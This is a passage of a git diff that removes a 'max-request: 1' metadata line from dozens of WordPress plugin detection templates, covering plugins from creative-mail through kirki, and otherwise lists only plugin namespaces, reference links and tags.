index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index c8acf8c625..43cb2ab09c 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
